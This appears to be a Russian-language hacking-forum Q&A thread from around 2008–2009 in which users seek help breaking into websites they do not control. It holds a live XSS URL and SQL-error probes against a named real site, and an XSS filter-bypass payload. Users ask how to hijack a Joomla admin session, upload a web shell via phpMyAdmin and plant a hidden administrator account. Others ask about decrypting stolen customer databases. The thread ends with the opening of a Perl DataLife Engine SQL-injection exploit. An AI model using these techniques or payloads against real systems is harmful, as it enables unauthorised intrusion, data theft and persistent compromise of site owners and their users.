Просмотр полной версии : [Задай Вопрос - Получи Ответ]
Внимание! Данная тема предназначена для Ваших вопросов. Создавать темы, посвященные какому - либо вопросу - не нужно, все спрашиваем тут, в переделах тематики раздела. Созданные темы, содержащие вопрос будут удаляться, как оффтоп// ZAMUT
Привет всем!
Подскажите как влезть в админку Джумлы имея на руках id админской сессии, добытый через Sql-inj? Брут хеша пароля (вытащенный также из БД) не удается.
cybersly
18.11.2008, 01:03
никак
return md5( $conf->getValue('config.secret') . $seed );
нужно занать secret из configuration.php
Экспоит под WP 2\0\5 -ссылка (http://milw0rm.com/exploits/3095)
ПРи запуске выбивает ошибку.
http://img266.imageshack.us/img266/1851/43813173eg6.gif (http://imageshack.us)
Что и где я делаю неправильно?
С меня ++ =)
А ты его что через перл может запускаешь)?
А ты его что через перл может запускаешь)?
C чего ты взял?
anti-killer
03.12.2008, 18:13
Вопроски такой...как узнать версию движка? На пример WordPress.
Karantin
03.12.2008, 18:21
Вопроски такой...как узнать версию движка? На пример WordPress.
Вордпресс можешь в исходник страницы посмотреть <meta name="generator" content="WordPress 2.6.3" />
anti-killer
03.12.2008, 18:35
Во сновном все это дело сносят.... я надеился на какой нибуть сканер версии движка.
Вопроски такой...как узнать версию движка? На пример WordPress. Индивидуально, для wordpress:
https://forum.antichat.ru/threadnav50572-6-10.html#post655973
или
https://forum.antichat.ru/threadnav50572-6-10.html#post673056
Подскажите плииз, как блог ломанули этот _ttp://www.angelashelton.com/weblog/ .Ссылки подгружены 90% взлом был через двиг блога. Версия 2.0.1 . Потерзайте плииз, кому не сложно!
http://www.angelashelton.com/cgi-bin/pd/admin/
Ооо, это уже кое что, а все таки чеерез двиг вордпресса, есть вариант?...
NewBHack
20.12.2008, 23:06
ecuscan.com
Вот посмотрите плиз. Используется бд Jet Database +
Asp.
подозреваю что двиг самописный
Pashkela
20.12.2008, 23:50
Самосписный, несамописный, на вот, xss:
http://ecuscan.com/Support3.asp?categoryid=94&sortsid=1&supporttype=1&category=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C %2Fscript%3E%3C%22&sorts=BMW
Ошибки всяческие:
http://ecuscan.com/Support3.asp?categoryid='&sortsid=1&supporttype=1&category=ECU&sorts=BMW
NewBHack
21.12.2008, 16:30
ребят там дырок больше чем в сите, в том числе и sql-inj... дак вот я её собственно раскручивал, думал скачать такой же движок - посмотреть как она базу данных создает... нашел таблицу admin, email и прочее, а вот собственно название столбцов не могу...
Пробовал брутить - ничего :( :( ...
Поэтому и решил вас спросить мож подсказали бы что за двиг... Гуглил по кускам кода из содержания страницы, названиям гифок... нифига :(
1.) Подскажите какие CMS на таких сайтах :
http://webkiosk.com.ua/
http://www.popolni.net/
или это замописы ? или можете предоставить какие то cms на которые можна пополнения щетов зделать и т.д !
2.) Подскажите какойто двиг который бы подошол для размещения обьявлений на подобии продажи автомобилей !
Dream.fdr
07.01.2009, 01:36
Все никак недойду мозгой... насчет XSS. Пассивная - я понял - готовую ссылку впариваешь юзеру (он должен перейти по ней) - получаешь его куки. А активная?? Да, я понял - человек заходит просто на страницу или смотрит сообщение - куки твои, но мне что, прийдется менять файлы на бажном сервере?? но тогда ведь нужно иметь доступ к этим файлам, права и т.д.... или что? честно говоря я так и не уяснил этого ни в одном руководстве...((( объясните популярней танкисту.
Dream.fdr
07.01.2009, 01:53
Спасибо! Вот теперь понял! :)
Т.е. чтоб использовать акт. xss - нужно внести этот код на страницу путем размещения поста, подписи своей... понял!.. т.е. главное в этом - найти способ обхода фильтрации символов?
miptkvant
08.01.2009, 20:29
сайт ругнулся
General Error
SQL ERROR [ mysql4 ]
Can't connect to local MySQL server through socket '/var/lib/mysql/mysql.sock' (111) [2002]
An sql error occurred while fetching this page. Please contact an administrator if this problem persists.
что из этого я могу извлечь? насколько я понял версия mysql 4 а вот про бд непонял mysql.sock' (111) [2002]
что эт значит?
на запрос /stat_init_groovy?serviceIdentity=5 иногда можно получить вылет:
1. DB Error: no database selected
Code: 2013
Description: Lost connection to MySQL server during query
SQL: SELECT ss.id, ss.parent_id, ss.alias, ss.path, ss.c_img, ssd.name FROM sites_structure ss, sites_structure_desc ssd, sites_structure_access ssa WHERE ss.site_id='1' AND ssd.section_id=ss.id AND ssd.lang_id='1' AND ssa.section_id=ss.id AND ss.alias = 'group_wide' AND ssa.user_group_id IN (0, 1)
раскрыт SQL запрос, как его можно поюзать в плане подстановок?
куки:
b: b
PHPSESSID: ****************
services: 1
ua/group_mail/portal b: b
ua/group_wide/dsl_init b: b
ua/home_home_groovy b: b
group_wide я так понял указано с кукисов.. но придумать ему разумную подстановку не могу :(
DeepBlue7
12.01.2009, 20:52
Вообщем столкнулся с одним хитрым серваком )) Вообщем есть доступ в phpmyadmin.. но remote url include отрублен.... как залить шелл можно ?? Заливаю сбственно через phpmyadmin.
kapadult
16.01.2009, 18:25
Значит, вот скрипт который я хочу вставить <TABLE BACKGROUND="java script:alert('Я здесь был')"> Table background я использую для обхода фильтрации в блоге. При редактировании сообщения (предварительный просмотр) скрипт работает без проблем. Но в обычном режиме, когда сообщение уже размещено в блоге, этот (да и не только этот) скрипт перестает работать! В чём проблема???
kapadult
16.01.2009, 18:28
Не могу понять что за хрень... По-моему вообще весь скрипт вырезается! А главное, если редактируешь это сообщение, то там всё на месте... Короче вот, сами попробуйте:
Регистрация: http://pdj.ru/register/
Блог: http://pdj.ru/cp/blog/add/
P.S. Чтобы писать в блоге нужно обязательно зарегиться и подтвердить e-mail!
TypeError in Search#index
Showing app/views/basic_posts/_item.html.erb where line #3 raised:
can't modify frozen hash
Extracted source (around line #3):
1: <li class="item">
2: <%= render :partial => 'posts/meta', :locals => {:item => item, :top => local_assigns[:top]} %>
3: <h3><%= link_to_post item.title, item %></h3>
4: <div class="body formatted">
5: <% if @search %>
6: <%= item.parsed_body(current_user) %>
Trace of template inclusion: app/views/tops/_item.html.erb, app/views/search/index.html.erb
RAILS_ROOT: /home/xxx/releases/20090117051218
Application Trace | Framework Trace | Full Trace
vendor/rails/activerecord/lib/active_record/attribute_methods.rb:313:in `[]='
vendor/rails/activerecord/lib/active_record/attribute_methods.rb:313:in `write_attribute_without_dirty'
vendor/rails/activerecord/lib/active_record/dirty.rb:139:in `write_attribute'
vendor/rails/activerecord/lib/active_record/attribute_methods.rb:211:in `slug_cache='
lib/extensions/slug_cache.rb:16:in `update_slug_cache'
lib/extensions/slug_cache.rb:21:in `update_slug_cache!'
lib/extensions/slug_cache.rb:8:in `to_param'
(eval):16:in `blog_note_path'
app/controllers/application.rb:99:in `send'
app/controllers/application.rb:99:in `url_to_post'
(eval):2:in `send'
(eval):2:in `url_to_post'
app/helpers/application_helper.rb:80:in `link_to_post'
app/views/basic_posts/_item.html.erb:3
app/views/tops/_item.html.erb:1
app/views/search/index.html.erb:7
vendor/rails/activerecord/lib/active_record/attribute_methods.rb:313:in `[]='
vendor/rails/activerecord/lib/active_record/attribute_methods.rb:313:in `write_attribute_without_dirty'
vendor/rails/activerecord/lib/active_record/dirty.rb:139:in `write_attribute'
vendor/rails/activerecord/lib/active_record/attribute_methods.rb:211:in `slug_cache='
generated code (/home/xxx/releases/20090117051218/vendor/rails/actionpack/lib/action_controller/routing/route.rb:145):8:in `generate_raw'
generated code (/home/xxx/releases/20090117051218/vendor/rails/actionpack/lib/action_controller/routing/route.rb:154):2:in `generate'
vendor/rails/actionpack/lib/action_controller/routing/route_set.rb:343:in `generate'
vendor/rails/actionpack/lib/action_controller/url_rewriter.rb:208:in `rewrite_path'
vendor/rails/actionpack/lib/action_controller/url_rewriter.rb:187:in `rewrite_url'
vendor/rails/actionpack/lib/action_controller/url_rewriter.rb:165:in `rewrite'
vendor/rails/actionpack/lib/action_controller/base.rb:626:in `url_for'
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `send'
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `render'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:20:in `render'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:30:in `benchmark'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:19:in `render'
vendor/rails/actionpack/lib/action_view/template.rb:73:in `render_template'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:45:in `render_partial'
vendor/rails/actionpack/lib/action_view/partials.rb:152:in `render_partial'
vendor/rails/actionpack/lib/action_view/base.rb:258:in `render'
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `send'
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `render'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:20:in `render'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:30:in `benchmark'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:19:in `render'
vendor/rails/actionpack/lib/action_view/template.rb:73:in `render_template'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:45:in `render_partial'
vendor/rails/actionpack/lib/action_view/partials.rb:184:in `render_partial_collection'
vendor/plugins/ultrasphinx/lib/ultrasphinx/search.rb:433:in `map'
vendor/plugins/ultrasphinx/lib/ultrasphinx/search.rb:433:in `send'
vendor/plugins/ultrasphinx/lib/ultrasphinx/search.rb:433:in `method_missing'
vendor/rails/actionpack/lib/action_view/partials.rb:179:in `render_partial_collection'
vendor/rails/actionpack/lib/action_view/partials.rb:150:in `render_partial'
vendor/rails/actionpack/lib/action_view/base.rb:258:in `render'
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `send'
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `render'
vendor/rails/actionpack/lib/action_view/template.rb:73:in `render_template'
vendor/rails/actionpack/lib/action_view/base.rb:256:in `render'
vendor/rails/actionpack/lib/action_view/base.rb:367:in `_render_with_layout'
vendor/rails/actionpack/lib/action_view/base.rb:254:in `render'
vendor/rails/actionpack/lib/action_controller/base.rb:1177:in `render_for_file'
vendor/rails/actionpack/lib/action_controller/base.rb:896:in `render_without_benchmark'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:51:in `render_without_trace_View____determine_metric_pat h__Rendering'
vendor/rails/activesupport/lib/active_support/core_ext/benchmark.rb:8:in `realtime'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:51:in `render_without_trace_View____determine_metric_pat h__Rendering'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:138:in `render'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:41:in `trace_method_execution_with_scope'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:137:in `render'
vendor/rails/actionpack/lib/action_controller/base.rb:868:in `render_without_benchmark'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:51:in `render_without_trace_View____determine_metric_pat h__Rendering'
vendor/rails/activesupport/lib/active_support/core_ext/benchmark.rb:8:in `realtime'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:51:in `render_without_trace_View____determine_metric_pat h__Rendering'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:138:in `render'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:41:in `trace_method_execution_with_scope'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:137:in `render'
vendor/rails/actionpack/lib/action_controller/base.rb:1251:in `default_render'
vendor/rails/actionpack/lib/action_controller/base.rb:1257:in `perform_action_without_filters'
vendor/rails/actionpack/lib/action_controller/filters.rb:617:in `call_filters'
vendor/rails/actionpack/lib/action_controller/filters.rb:610:in `perform_action_without_benchmark'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:68:in `perform_action_without_rescue'
/usr/lib/ruby/1.8/benchmark.rb:293:in `measure'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:68:in `perform_action_without_rescue'
vendor/rails/actionpack/lib/action_controller/rescue.rb:136:in `perform_action_without_caching'
vendor/rails/actionpack/lib/action_controller/caching/sql_cache.rb:13:in `perform_action_without_newrelic_trace'
vendor/rails/activerecord/lib/active_record/connection_adapters/abstract/query_cache.rb:34:in `cache'
vendor/rails/activerecord/lib/active_record/query_cache.rb:8:in `cache'
vendor/rails/actionpack/lib/action_controller/caching/sql_cache.rb:12:in `perform_action_without_newrelic_trace'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/instrumentation/rails/action_controller.rb:58:in `passenger_orig_perform_action'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:41:in `trace_method_execution_with_scope'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/instrumentation/rails/action_controller.rb:47:in `passenger_orig_perform_action'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:18:in `trace_method_execution_no_scope'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/instrumentation/rails/action_controller.rb:41:in `passenger_orig_perform_action'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/request_handler.rb:53:in `perform_action'
vendor/rails/actionpack/lib/action_controller/base.rb:524:in `send'
vendor/rails/actionpack/lib/action_controller/base.rb:524:in `process_without_filters'
vendor/rails/actionpack/lib/action_controller/filters.rb:606:in `process_without_session_management_support'
vendor/rails/actionpack/lib/action_controller/session_management.rb:134:in `process'
vendor/rails/actionpack/lib/action_controller/base.rb:392:in `process'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:184:in `handle_request'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:112:in `dispatch_unlocked'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:125:in `dispatch'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:124:in `synchronize'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:124:in `dispatch'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:134:in `dispatch_cgi'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:41:in `dispatch_without_newrelic'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/instrumentation/dispatcher_instrumentation.rb:47:in `dispatch'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/request_handler.rb:38:in `process_request'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_request_handler.rb:165:in `main_loop'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:321:in `start_request_handler'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:282:in `handle_spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:163:in `safe_fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:161:in `fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:161:in `safe_fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:280:in `handle_spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:163:in `safe_fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:161:in `fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:161:in `safe_fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:279:in `handle_spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:317:in `__send__'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:317:in `main_loop'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:168:in `start_synchronously'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:135:in `start'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:112:in `fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:112:in `start'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:179:in `start'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:222:in `spawn_rails_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:217:in `synchronize'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:217:in `spawn_rails_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:126:in `spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:251:in `handle_spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:317:in `__send__'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:317:in `main_loop'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:168:in `start_synchronously'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/bin/passenger-spawn-server:46
vendor/rails/activerecord/lib/active_record/attribute_methods.rb:313:in `[]='
vendor/rails/activerecord/lib/active_record/attribute_methods.rb:313:in `write_attribute_without_dirty'
vendor/rails/activerecord/lib/active_record/dirty.rb:139:in `write_attribute'
vendor/rails/activerecord/lib/active_record/attribute_methods.rb:211:in `slug_cache='
lib/extensions/slug_cache.rb:16:in `update_slug_cache'
lib/extensions/slug_cache.rb:21:in `update_slug_cache!'
lib/extensions/slug_cache.rb:8:in `to_param'
generated code (/home/xxx/releases/20090117051218/vendor/rails/actionpack/lib/action_controller/routing/route.rb:145):8:in `generate_raw'
generated code (/home/xxx/releases/20090117051218/vendor/rails/actionpack/lib/action_controller/routing/route.rb:154):2:in `generate'
vendor/rails/actionpack/lib/action_controller/routing/route_set.rb:343:in `generate'
vendor/rails/actionpack/lib/action_controller/url_rewriter.rb:208:in `rewrite_path'
vendor/rails/actionpack/lib/action_controller/url_rewriter.rb:187:in `rewrite_url'
vendor/rails/actionpack/lib/action_controller/url_rewriter.rb:165:in `rewrite'
vendor/rails/actionpack/lib/action_controller/base.rb:626:in `url_for'
(eval):16:in `blog_note_path'
app/controllers/application.rb:99:in `send'
app/controllers/application.rb:99:in `url_to_post'
(eval):2:in `send'
(eval):2:in `url_to_post'
app/helpers/application_helper.rb:80:in `link_to_post'
app/views/basic_posts/_item.html.erb:3
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `send'
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `render'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:20:in `render'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:30:in `benchmark'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:19:in `render'
vendor/rails/actionpack/lib/action_view/template.rb:73:in `render_template'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:45:in `render_partial'
vendor/rails/actionpack/lib/action_view/partials.rb:152:in `render_partial'
vendor/rails/actionpack/lib/action_view/base.rb:258:in `render'
app/views/tops/_item.html.erb:1
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `send'
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `render'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:20:in `render'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:30:in `benchmark'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:19:in `render'
vendor/rails/actionpack/lib/action_view/template.rb:73:in `render_template'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:45:in `render_partial'
vendor/rails/actionpack/lib/action_view/partials.rb:184:in `render_partial_collection'
vendor/plugins/ultrasphinx/lib/ultrasphinx/search.rb:433:in `map'
vendor/plugins/ultrasphinx/lib/ultrasphinx/search.rb:433:in `send'
vendor/plugins/ultrasphinx/lib/ultrasphinx/search.rb:433:in `method_missing'
vendor/rails/actionpack/lib/action_view/partials.rb:179:in `render_partial_collection'
vendor/rails/actionpack/lib/action_view/partials.rb:150:in `render_partial'
vendor/rails/actionpack/lib/action_view/base.rb:258:in `render'
app/views/search/index.html.erb:7
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `send'
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `render'
vendor/rails/actionpack/lib/action_view/template.rb:73:in `render_template'
vendor/rails/actionpack/lib/action_view/base.rb:256:in `render'
vendor/rails/actionpack/lib/action_view/base.rb:367:in `_render_with_layout'
vendor/rails/actionpack/lib/action_view/base.rb:254:in `render'
vendor/rails/actionpack/lib/action_controller/base.rb:1177:in `render_for_file'
vendor/rails/actionpack/lib/action_controller/base.rb:896:in `render_without_benchmark'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:51:in `render_without_trace_View____determine_metric_pat h__Rendering'
vendor/rails/activesupport/lib/active_support/core_ext/benchmark.rb:8:in `realtime'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:51:in `render_without_trace_View____determine_metric_pat h__Rendering'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:138:in `render'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:41:in `trace_method_execution_with_scope'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:137:in `render'
vendor/rails/actionpack/lib/action_controller/base.rb:868:in `render_without_benchmark'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:51:in `render_without_trace_View____determine_metric_pat h__Rendering'
vendor/rails/activesupport/lib/active_support/core_ext/benchmark.rb:8:in `realtime'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:51:in `render_without_trace_View____determine_metric_pat h__Rendering'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:138:in `render'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:41:in `trace_method_execution_with_scope'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:137:in `render'
vendor/rails/actionpack/lib/action_controller/base.rb:1251:in `default_render'
vendor/rails/actionpack/lib/action_controller/base.rb:1257:in `perform_action_without_filters'
vendor/rails/actionpack/lib/action_controller/filters.rb:617:in `call_filters'
vendor/rails/actionpack/lib/action_controller/filters.rb:610:in `perform_action_without_benchmark'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:68:in `perform_action_without_rescue'
/usr/lib/ruby/1.8/benchmark.rb:293:in `measure'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:68:in `perform_action_without_rescue'
vendor/rails/actionpack/lib/action_controller/rescue.rb:136:in `perform_action_without_caching'
vendor/rails/actionpack/lib/action_controller/caching/sql_cache.rb:13:in `perform_action_without_newrelic_trace'
vendor/rails/activerecord/lib/active_record/connection_adapters/abstract/query_cache.rb:34:in `cache'
vendor/rails/activerecord/lib/active_record/query_cache.rb:8:in `cache'
vendor/rails/actionpack/lib/action_controller/caching/sql_cache.rb:12:in `perform_action_without_newrelic_trace'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/instrumentation/rails/action_controller.rb:58:in `passenger_orig_perform_action'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:41:in `trace_method_execution_with_scope'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/instrumentation/rails/action_controller.rb:47:in `passenger_orig_perform_action'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:18:in `trace_method_execution_no_scope'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/instrumentation/rails/action_controller.rb:41:in `passenger_orig_perform_action'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/request_handler.rb:53:in `perform_action'
vendor/rails/actionpack/lib/action_controller/base.rb:524:in `send'
vendor/rails/actionpack/lib/action_controller/base.rb:524:in `process_without_filters'
vendor/rails/actionpack/lib/action_controller/filters.rb:606:in `process_without_session_management_support'
vendor/rails/actionpack/lib/action_controller/session_management.rb:134:in `process'
vendor/rails/actionpack/lib/action_controller/base.rb:392:in `process'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:184:in `handle_request'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:112:in `dispatch_unlocked'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:125:in `dispatch'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:124:in `synchronize'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:124:in `dispatch'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:134:in `dispatch_cgi'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:41:in `dispatch_without_newrelic'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/instrumentation/dispatcher_instrumentation.rb:47:in `dispatch'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/request_handler.rb:38:in `process_request'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_request_handler.rb:165:in `main_loop'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:321:in `start_request_handler'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:282:in `handle_spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:163:in `safe_fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:161:in `fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:161:in `safe_fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:280:in `handle_spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:163:in `safe_fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:161:in `fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:161:in `safe_fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:279:in `handle_spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:317:in `__send__'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:317:in `main_loop'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:168:in `start_synchronously'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:135:in `start'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:112:in `fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:112:in `start'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:179:in `start'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:222:in `spawn_rails_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:217:in `synchronize'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:217:in `spawn_rails_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:126:in `spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:251:in `handle_spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:317:in `__send__'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:317:in `main_loop'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:168:in `start_synchronously'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/bin/passenger-spawn-server:46
Request
Parameters:
{"q"=>"xxx"}
Show session dump
---
:user_id: xxx
:return_to: /xxx/xxx/xxx/x
flash: !map:ActionController::Flash::FlashHash {}
Response
Headers:
{"X-Powered-By"=>"Phusion Passenger (mod_rails/mod_rack) 2.0.6",
"Content-Type"=>"text/html",
"cookie"=>[],
"Cache-Control"=>"no-cache"}
Можно ли что-то с этим сделать?
и кста, как прятать в спойлеры?
Octave_Parango
23.01.2009, 10:53
Всем привет!
Подскажите если кто знает, дело такое.
Слил пару баз с нескольких ресурсов, крутились на OsCommerce,
там же прикручен модуль E-Commerce Engine (кто знает, тот знает).
В базе некоторые данные имеют не читабельный вид
пример:
(b?NЇi3e_©µгbђоЂ1)
От сюда вопрос:
Хранятся ли алго. в скриптах?
Если да, то какие нужно слить?
Спасибо!
p.s. Если не туда запостил - сорри!
as3kpwnz
26.01.2009, 14:48
^ Может кодировка албанская ? =)
Подскажите можно-ли в joomla (1.5.4 ) имея полный доступ к FTP и к joomle создать там скрытую учетную запись - с правами администратора - но чтобы она в админ панели не светилась. И с помощью нее управлять cms.
Спасибо!
Demiurge
29.01.2009, 14:40
Возник вопрос, пробую спойлом получить доступ, но к сожалению не выходит. Может ли кто-то подсказать ,каким образом, или спойлом можно вскрыть админа? А еще лучше доступ на сервер..
http://graphcodegroup.com/ttt.jpg
Сплой:
#!/usr/bin/perl
## DataLife Engine sql injection exploit by RST/GHC
## (c)oded by 1dt.w0lf
## RST/GHC
## http://rst.void.ru
## http://ghc.ru
## 18.06.06
use LWP::UserAgent;
use Getopt::Std;
getopts('u:n:p:');
$url = $opt_u;
$name = $opt_n;
$prefix = $opt_p || 'dle_';
if(!$url || !$name) { &usage; }
$s_num = 1;
$|++;
$n = 0;
&head;
print "\r\n";
print " [~] URL : $url\r\n";
